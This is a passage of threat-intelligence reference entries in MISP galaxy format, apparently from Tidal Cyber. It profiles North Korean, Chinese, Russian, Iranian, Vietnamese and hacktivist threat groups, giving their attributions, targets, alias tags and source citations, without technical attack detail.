[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) has primarily focused its operations—​which have included destructive attacks—​against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.<sup>[[FSI Andariel Campaign Rifle July 2017](https://app.tidalcyber.com/references/bde61ee9-16f9-4bd9-a847-5cc9df21335c)]</sup><sup>[[IssueMakersLab Andariel GoldenAxe May 2017](https://app.tidalcyber.com/references/10a21964-d31f-40af-bf32-5ccd7d8c99a2)]</sup><sup>[[AhnLab Andariel Subgroup of Lazarus June 2018](https://app.tidalcyber.com/references/bbc66e9f-98f9-4e34-b568-2833ea536f2e)]</sup><sup>[[TrendMicro New Andariel Tactics July 2018](https://app.tidalcyber.com/references/b667eb44-8c2f-4319-bc93-f03610214b8b)]</sup><sup>[[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]</sup>

[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is considered a sub-set of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), and has been attributed to North Korea’s Reconnaissance General Bureau.<sup>[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="Andariel"

AnonGhost

AnonGhost is an apparent hacktivist collective. In October 2023, following a series of air- and land-based attacks in the Gaza Strip, AnonGhost was one of several hacktivist groups that claimed responsibility for disruptive attacks against computer networks in Israel. Researchers indicated that they observed AnonGhost actors exploit an undisclosed API vulnerability in Red Alert, an application that provides warning of projectile attacks in Israel, using Python scripts to intercept web requests and send spam messages to the app’s users.<sup>[[Group-IB Threat Intelligence Tweet October 9 2023](/references/2df546ed-6577-44b2-9b26-0a17c3622df7)]</sup>

The tag is: misp-galaxy:groups="AnonGhost"

Storm-1359 - Associated Group

<sup>[[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)]</sup>

The tag is: misp-galaxy:groups="Storm-1359 - Associated Group"

Anonymous Sudan

Anonymous Sudan is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) and website defacement attacks in support of its ideology, which appears to largely align with Russian state interests. The group regularly cross-promotes communications with Killnet, another hacktivist group that appears to share similar ideologies and methods of operation.<sup>[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)]</sup> Researchers assess that the group is affiliated with neither the Anonymous hacktivist group nor Sudan.<sup>[[CyberCX Anonymous Sudan June 19 2023](/references/68ded9b7-3042-44e0-8bf7-cdba2174a3d8)]</sup>

Since emerging in January 2023, Anonymous Sudan has claimed and is believed to be responsible for a considerable number of DDoS attacks affecting victims in a wide range of geographic locations and sectors.<sup>[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)]</sup> It claimed responsibility for a series of early June 2023 DDoS attacks that caused temporary interruptions to Microsoft Azure, Outlook, and OneDrive services. Microsoft security researchers attributed those attacks to the Storm-1359 group.<sup>[[The Hacker News Microsoft DDoS June 19 2023](/references/2ee27b55-b7a7-40a8-8c0b-5e28943cd273)]</sup><sup>[[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)]</sup> Like Killnet, Anonymous Sudan claimed responsibility for disruptive attacks against computer networks in Israel following a series of air- and land-based attacks in the Gaza Strip in October 2023.<sup>[[FalconFeedsio Tweet October 9 2023](/references/e9810a28-f060-468b-b4ea-ffed9403ae8b)]</sup>

The tag is: misp-galaxy:groups="Anonymous Sudan"

Aoqin Dragon

[Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) and UNC94, based on malware, infrastructure, and targets.<sup>[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]</sup>

The tag is: misp-galaxy:groups="Aoqin Dragon"

Comment Group - Associated Group

The tag is: misp-galaxy:groups="Comment Group - Associated Group"

Comment Panda - Associated Group

The tag is: misp-galaxy:groups="Comment Panda - Associated Group"

Comment Crew - Associated Group

The tag is: misp-galaxy:groups="Comment Crew - Associated Group"

APT1

[APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:groups="APT1"

DynCalc - Associated Group

The tag is: misp-galaxy:groups="DynCalc - Associated Group"

IXESHE - Associated Group

The tag is: misp-galaxy:groups="IXESHE - Associated Group"

Numbered Panda - Associated Group

The tag is: misp-galaxy:groups="Numbered Panda - Associated Group"

DNSCALC - Associated Group

The tag is: misp-galaxy:groups="DNSCALC - Associated Group"

APT12

[APT12](https://app.tidalcyber.com/groups/225314a7-8f40-48d4-9cff-3ec39b177762) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup>

The tag is: misp-galaxy:groups="APT12"

APT16

[APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. <sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup>

The tag is: misp-galaxy:groups="APT16"

Deputy Dog - Associated Group

The tag is: misp-galaxy:groups="Deputy Dog - Associated Group"

APT17

[APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. <sup>[[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]</sup>

The tag is: misp-galaxy:groups="APT17"

TG-0416 - Associated Group

<sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup><sup>[[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]</sup>

The tag is: misp-galaxy:groups="TG-0416 - Associated Group"

Dynamite Panda - Associated Group

<sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup><sup>[[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]</sup>

The tag is: misp-galaxy:groups="Dynamite Panda - Associated Group"

Threat Group-0416 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-0416 - Associated Group"

APT18

[APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. <sup>[[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]</sup>

The tag is: misp-galaxy:groups="APT18"

Codoso - Associated Group

The tag is: misp-galaxy:groups="Codoso - Associated Group"

C0d0so0 - Associated Group

The tag is: misp-galaxy:groups="C0d0so0 - Associated Group"

Codoso Team - Associated Group

The tag is: misp-galaxy:groups="Codoso Team - Associated Group"

Sunshop Group - Associated Group

The tag is: misp-galaxy:groups="Sunshop Group - Associated Group"

APT19

[APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. <sup>[[FireEye APT19](https://app.tidalcyber.com/references/d75508b1-8b85-47c9-a087-bc64e8e4cb33)]</sup> Some analysts track [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) and [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) as the same group, but it is unclear from open source information if the groups are the same. <sup>[[ICIT China’s Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]</sup> <sup>[[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)]</sup> <sup>[[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]</sup>

The tag is: misp-galaxy:groups="APT19"

VIOLIN PANDA - Associated Group

The tag is: misp-galaxy:groups="VIOLIN PANDA - Associated Group"

TH3Bug - Associated Group

The tag is: misp-galaxy:groups="TH3Bug - Associated Group"

Crawling Taurus - Associated Group

<sup>[[Unit 42 ATOM Crawling Taurus](/references/75098b2c-4928-4e3f-9bcc-b4f6b8de96f8)]</sup>

The tag is: misp-galaxy:groups="Crawling Taurus - Associated Group"

Twivy - Associated Group

<sup>[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]</sup>

The tag is: misp-galaxy:groups="Twivy - Associated Group"

APT20

APT20 is a suspected China-attributed espionage actor. It has attacked organizations in a wide range of verticals for data theft. These operations appear to be motivated by the acquisition of intellectual property but also collection of information around individuals with particular political interests.<sup>[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]</sup> Researchers attributed, with medium confidence, the years-long Operation Wocao espionage campaign to APT20.<sup>[[FoxIT Wocao December 2019](/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:groups="APT20"

IRON TWILIGHT - Associated Group

<sup>[[Secureworks IRON TWILIGHT Profile](https://app.tidalcyber.com/references/2fc5b9dc-3745-4760-b116-5cc5abb9101d)]</sup><sup>[[Secureworks IRON TWILIGHT Active Measures March 2017](https://app.tidalcyber.com/references/0d28c882-5175-4bcf-9c82-e6c4394326b6)]</sup>

The tag is: misp-galaxy:groups="IRON TWILIGHT - Associated Group"

Sednit - Associated Group

This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT]([FireEye APT28 January 2017(https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup>

The tag is: misp-galaxy:groups="Sednit - Associated Group"

Sofacy - Associated Group

This designation has been used in reporting both to refer to the threat group and its associated malware.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup><sup>[[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]</sup>

The tag is: misp-galaxy:groups="Sofacy - Associated Group"

Fancy Bear - Associated Group

The tag is: misp-galaxy:groups="Fancy Bear - Associated Group"

SNAKEMACKEREL - Associated Group

<sup>[[Accenture SNAKEMACKEREL Nov 2018](https://app.tidalcyber.com/references/c38d021c-d84c-4aa7-b7a5-be47e18df1d8)]</sup>

The tag is: misp-galaxy:groups="SNAKEMACKEREL - Associated Group"

Swallowtail - Associated Group

The tag is: misp-galaxy:groups="Swallowtail - Associated Group"

Group 74 - Associated Group

The tag is: misp-galaxy:groups="Group 74 - Associated Group"

Pawn Storm - Associated Group

The tag is: misp-galaxy:groups="Pawn Storm - Associated Group"

STRONTIUM - Associated Group

<sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup><sup>[[Microsoft STRONTIUM Aug 2019](https://app.tidalcyber.com/references/7efd3c8d-5e69-4b6f-8edb-9186abdf0e1a)]</sup><sup>[[Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020](https://app.tidalcyber.com/references/0a65008c-acdd-40fa-af1a-3d9941af8eac)]</sup><sup>[[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)]</sup><sup>[[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]</sup>

The tag is: misp-galaxy:groups="STRONTIUM - Associated Group"

Forest Blizzard - Associated Group

<sup>[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]</sup>

The tag is: misp-galaxy:groups="Forest Blizzard - Associated Group"

Tsar Team - Associated Group

The tag is: misp-galaxy:groups="Tsar Team - Associated Group"

Threat Group-4127 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-4127 - Associated Group"

TG-4127 - Associated Group

The tag is: misp-galaxy:groups="TG-4127 - Associated Group"

APT28

[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.<sup>[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)]</sup><sup>[[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]</sup> This group has been active since at least 2004.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup><sup>[[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]</sup><sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)]</sup><sup>[[Sofacy DealersChoice](https://app.tidalcyber.com/references/ec157d0c-4091-43f5-85f1-a271c4aac1fc)]</sup><sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]</sup><sup>[[ESET Zebrocy May 2019](https://app.tidalcyber.com/references/f8b837fb-e46c-4153-8e86-dc4b909b393a)]</sup>

[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. <sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup> In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.<sup>[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]</sup> Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666).

The tag is: misp-galaxy:groups="APT28"

StellarParticle - Associated Group

<sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:groups="StellarParticle - Associated Group"

NOBELIUM - Associated Group

The tag is: misp-galaxy:groups="NOBELIUM - Associated Group"

Cozy Bear - Associated Group

The tag is: misp-galaxy:groups="Cozy Bear - Associated Group"

IRON HEMLOCK - Associated Group

<sup>[[Secureworks IRON HEMLOCK Profile](https://app.tidalcyber.com/references/36191a48-4661-42ea-b194-2915c9b184f3)]</sup>

The tag is: misp-galaxy:groups="IRON HEMLOCK - Associated Group"

Dark Halo - Associated Group

The tag is: misp-galaxy:groups="Dark Halo - Associated Group"

The Dukes - Associated Group

The tag is: misp-galaxy:groups="The Dukes - Associated Group"

SolarStorm - Associated Group

<sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup>

The tag is: misp-galaxy:groups="SolarStorm - Associated Group"

Blue Kitsune - Associated Group

The tag is: misp-galaxy:groups="Blue Kitsune - Associated Group"

UNC3524 - Associated Group

<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup>

The tag is: misp-galaxy:groups="UNC3524 - Associated Group"

Midnight Blizzard - Associated Group

<sup>[[Microsoft Midnight Blizzard January 19 2024](/references/91b48ddd-9e3f-4d36-a262-3b52145b3db2)]</sup>

The tag is: misp-galaxy:groups="Midnight Blizzard - Associated Group"

IRON RITUAL - Associated Group

<sup>[[Secureworks IRON RITUAL Profile](https://app.tidalcyber.com/references/c1ff66d6-3ea3-4347-8a8b-447cd8b48dab)]</sup>

The tag is: misp-galaxy:groups="IRON RITUAL - Associated Group"

NobleBaron - Associated Group

<sup>[[SentinelOne NobleBaron June 2021](https://app.tidalcyber.com/references/98cf2bb0-f36c-45af-8d47-bf26aca3bb09)]</sup>

The tag is: misp-galaxy:groups="NobleBaron - Associated Group"

UNC2452 - Associated Group

<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup>

The tag is: misp-galaxy:groups="UNC2452 - Associated Group"

YTTRIUM - Associated Group

<sup>[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]</sup>

The tag is: misp-galaxy:groups="YTTRIUM - Associated Group"

CozyDuke - Associated Group

The tag is: misp-galaxy:groups="CozyDuke - Associated Group"

APT29

[APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) is threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).<sup>[[White House Imposing Costs RU Gov April 2021](https://app.tidalcyber.com/references/c2bf9e2f-cd0a-411d-84bc-61454a369c6b)]</sup><sup>[[UK Gov Malign RIS Activity April 2021](https://app.tidalcyber.com/references/7fe5a605-c33e-4d3d-b787-2d1f649bee53)]</sup> They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) reportedly compromised the Democratic National Committee starting in the summer of 2015.<sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup><sup>[[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)]</sup><sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[UK Gov UK Exposes Russia SolarWinds April 2021](https://app.tidalcyber.com/references/ffbd83d7-9d4f-42b9-adc0-eb144045aef2)]</sup>

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to the SVR; public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.<sup>[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)]</sup><sup>[[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)]</sup> Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup><sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup><sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)]</sup><sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup>

The tag is: misp-galaxy:groups="APT29"

Gothic Panda - Associated Group

The tag is: misp-galaxy:groups="Gothic Panda - Associated Group"

Pirpi - Associated Group

The tag is: misp-galaxy:groups="Pirpi - Associated Group"

UPS Team - Associated Group

The tag is: misp-galaxy:groups="UPS Team - Associated Group"

Buckeye - Associated Group

The tag is: misp-galaxy:groups="Buckeye - Associated Group"

Threat Group-0110 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-0110 - Associated Group"

TG-0110 - Associated Group

The tag is: misp-galaxy:groups="TG-0110 - Associated Group"

APT3

[APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) is a China-based threat group that researchers have attributed to China’s Ministry of State Security.<sup>[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]</sup><sup>[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)]</sup> This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.<sup>[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]</sup><sup>[[FireEye Operation Double Tap](https://app.tidalcyber.com/references/4b9af128-98da-48b6-95c7-8d27979c2ab1)]</sup> As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.<sup>[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]</sup>

In 2017, MITRE developed an APT3 Adversary Emulation Plan.<sup>[[APT3 Adversary Emulation Plan](https://app.tidalcyber.com/references/64c01921-c33f-402e-b30d-a2ba26583a24)]</sup>

The tag is: misp-galaxy:groups="APT3"

APT30

[APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.<sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup><sup>[[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]</sup>

The tag is: misp-galaxy:groups="APT30"

OceanLotus - Associated Group

The tag is: misp-galaxy:groups="OceanLotus - Associated Group"

APT-C-00 - Associated Group

The tag is: misp-galaxy:groups="APT-C-00 - Associated Group"

SeaLotus - Associated Group

The tag is: misp-galaxy:groups="SeaLotus - Associated Group"

APT32

[APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.<sup>[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]</sup><sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup><sup>[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]</sup>

The tag is: misp-galaxy:groups="APT32"

HOLMIUM - Associated Group

The tag is: misp-galaxy:groups="HOLMIUM - Associated Group"

Elfin - Associated Group

The tag is: misp-galaxy:groups="Elfin - Associated Group"

Peach Sandstorm - Associated Group

<sup>[[Microsoft Peach Sandstorm September 14 2023](/references/98a631f4-4b95-4159-b311-dee1216ec208)]</sup>

The tag is: misp-galaxy:groups="Peach Sandstorm - Associated Group"

APT33

[APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. <sup>[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup> <sup>[[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]</sup>

The tag is: misp-galaxy:groups="APT33"

InkySquid - Associated Group

<sup>[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]</sup>

The tag is: misp-galaxy:groups="InkySquid - Associated Group"

ScarCruft - Associated Group

The tag is: misp-galaxy:groups="ScarCruft - Associated Group"

Reaper - Associated Group

The tag is: misp-galaxy:groups="Reaper - Associated Group"

Group123 - Associated Group

The tag is: misp-galaxy:groups="Group123 - Associated Group"

TEMP.Reaper - Associated Group

The tag is: misp-galaxy:groups="TEMP.Reaper - Associated Group"

Ricochet Chollima - Associated Group

<sup>[[CrowdStrike Richochet Chollima September 2021](https://app.tidalcyber.com/references/69a23467-c55c-43a3-951d-c208e6ead6f7)]</sup>

The tag is: misp-galaxy:groups="Ricochet Chollima - Associated Group"

APT37

